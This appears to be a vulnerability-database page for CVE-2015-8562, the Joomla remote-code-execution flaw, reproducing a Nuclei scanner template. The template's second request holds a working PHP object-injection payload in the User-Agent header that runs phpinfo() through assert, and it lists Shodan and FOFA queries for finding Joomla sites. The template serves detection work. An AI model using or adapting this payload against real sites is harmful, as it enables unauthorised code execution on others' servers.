CVE-2015-8562: Joomla HTTP Header Unauthenticated - Remote Code Execution

日期: 2025-08-01 | 影响软件: Joomla | POC: 已公开

漏洞描述

Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015

PoC代码[已公开]

id: CVE-2015-8562

info:
  name: Joomla HTTP Header Unauthenticated - Remote Code Execution
  author: kairos-hk,bolkv,n0ming,RoughBoy0723
  description: |
    Joomla! 1.5.x, 2.x, and 3.x before 3.4.6 allow remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via the HTTP User-Agent header, as exploited in the wild in December 2015
  severity: high
  reference:
    - https://github.com/vulhub/vulhub/tree/master/joomla/CVE-2015-8562
    - https://nvd.nist.gov/vuln/detail/CVE-2015-8562
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2015-8562
    epss-score: 0.93238
    epss-percentile: 0.99796
  metadata:
    max-request: 2
    vendor: joomla
    product: joomla\!
    shodan-query:
      - http.html:"joomla! - open source content management"
      - http.component:"joomla"
      - cpe:"cpe:2.3:a:joomla:joomla\!"
    fofa-query: body="joomla! - open source content management"
  tags: cve,cve2015,joomla,rce,unauth

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"Joomla")'
          - 'status_code == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        User-Agent: 123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:37:"phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}𝌆
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022046c876fa183f8382f404e6dadf6ea28fba4a9a47e6961dc2dc97a6f3695e98980220043132d6f80fcf6e8414af0da503c62489386a0ea5aac0b58ba216693fe67681:922c64590222798bb761d5b6d8e72950

相关漏洞推荐